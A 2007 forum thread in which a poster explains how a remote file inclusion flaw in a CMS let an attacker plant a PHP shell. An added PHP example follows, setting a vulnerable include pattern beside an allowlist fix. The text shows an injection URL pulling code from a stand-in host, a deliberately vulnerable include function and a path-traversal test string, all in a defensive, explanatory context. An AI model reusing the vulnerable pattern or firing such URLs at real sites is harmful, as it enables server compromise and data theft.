WeirdCode - 12:05 pm on Mar 14, 2007 (gmt 0)
Maybe I should explain this a little more extensively. We had a similar problem on our server. It was abused for file sharing though. We had a CMS running, which had a remote file inclusion vulnerability. (Mind you, this is only one example among many, many other possibilities.) I'll simplify it a little. The CMS would call a subroutine:

http://www.my-server.com/include=my_subroutine

The input of "my_subroutine" was not sanitized - a flaw in the software. All the attacker had to do was:

http://www.my-server.com/include=http://bad-guy.com/malicious_code.php

"malicious_code" would be, for example, a shell script. This script was stored on my server, and then this guy could call

http://www.my-server.com/malicious_code.php?command=[many nasty things]

So they installed their own server management software by means of a flawed piece of software, and from that moment on they could manipulate the system, including static HTML pages like those on your site.

In other words, the weak point is NOT the HTML file you are looking at. The problem is somewhere else. Someone gained, and most likely still has, access to your system, and they are able to do with your files whatever they want. And if they are really, really clever they will do it without any obvious sign.

Do you have sensitive information in a MySQL database, like credit card info of your customers? These PHP shell scripts may have MySQL access too. Add a weak MySQL password to this, and they are already selling your confidential info to interested third parties.

Your machine is compromised. You can't trust it any longer. You may want to google for expressions like "root kit", "r57 shell", "remote file inclusion"; then you will get an idea of what happened to your server. The altered HTML file is but the tip of the iceberg. By means of an additional kernel vulnerability they may even have gained root access. This would mean that they can show you whatever they want, while they are doing something else. A compromised server in the hands of an unknown attacker is the cyberspace equivalent of a loaded gun in the hands of whoever in a busy mall.
Once they have gained access to your system, and they did, they can do ANYTHING, including sending death threats to the president, if they wish. You'd have a hard time saying "But it wasn't me, it was someone else." It's your system, you are responsible. Let's assume you're buying something at eBay or Amazon, your credit card info is stolen from their hacked server, and your accounts are billed like crazy. Imagine you complain ("Hey, I've only bought this book at $10, not the holiday home at $2.000.000"), and they say: "Oh, we are so sorry, but we are not liable. You see, it was someone else." I'm sure you get the picture.

BTW, the intrusion did not necessarily originate from your own account on that server. If it's virtual hosting, maybe a different web site was hacked, and by means of privilege escalation they are working their way through all accounts on that server now. Maybe you should talk to your provider. If your site is on a dedicated server, and if you are the owner, you should reset it immediately.
selomelo: Thank you for your comments. In fact, the affected page is a static HTML file. It contains no PHP script. As a precaution, I immediately changed the password. But I am researching other possible means to protect the site from further attacks, including resetting my account. From now on, I will closely monitor the site, and at the first indication that there might be similar problems, I will reset the site without hesitation.
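The remote file inclusion WeirdCode describes above, as an added example that is not code from the original thread or from the CMS involved: the vulnerable include pattern beside a hardened form. The parameter name "include", the module names and the file paths are assumptions; the URLs are the ones from the post.

```php
<?php
// Added example, not the CMS code from the thread. The "include" parameter,
// the module names and the paths under modules/ are assumptions.

// --- Vulnerable pattern: the hole described in the post ---
// With allow_url_include=On (PHP >= 5.2; allow_url_fopen on older PHP),
// include() fetches http://bad-guy.com/malicious_code.php over the network
// and executes it with the web server's privileges. The attacker only has to
// change ?include=my_subroutine to ?include=http://bad-guy.com/malicious_code.php
function vulnerable_dispatch(array $get): void
{
    include $get['include'];   // user input names the file to execute
}

// --- Hardened pattern ---
// Never let request data name a file. Map the parameter onto a fixed
// allowlist of known modules and reject everything else (URLs, ../ paths,
// php://, data:, null bytes: none of them can ever match a key).
const MODULES = [
    'my_subroutine' => __DIR__ . '/modules/my_subroutine.php',
    'news'          => __DIR__ . '/modules/news.php',
];

function resolve_module(?string $name): ?string
{
    if ($name === null || !array_key_exists($name, MODULES)) {
        return null;
    }
    return MODULES[$name];
}

function safe_dispatch(array $get): void
{
    $file = resolve_module($get['include'] ?? null);
    if ($file === null) {
        http_response_code(404);
        echo 'no such page';
        return;
    }
    include $file;             // always one of the fixed paths above
}

// Show the resolver's decision for the inputs from the post plus a
// traversal attempt (constructed sample inputs).
$samples = [
    'my_subroutine',
    'http://bad-guy.com/malicious_code.php',
    '../../etc/passwd',
];
foreach ($samples as $in) {
    printf("%-40s => %s\n", $in, resolve_module($in) ?? 'REJECTED');
}
```

The allowlist is the fix; setting allow_url_include = Off (and allow_url_fopen = Off where nothing needs it) in php.ini is defence in depth, since it stops include() from fetching remote code even if another parameter is mishandled somewhere else in the application.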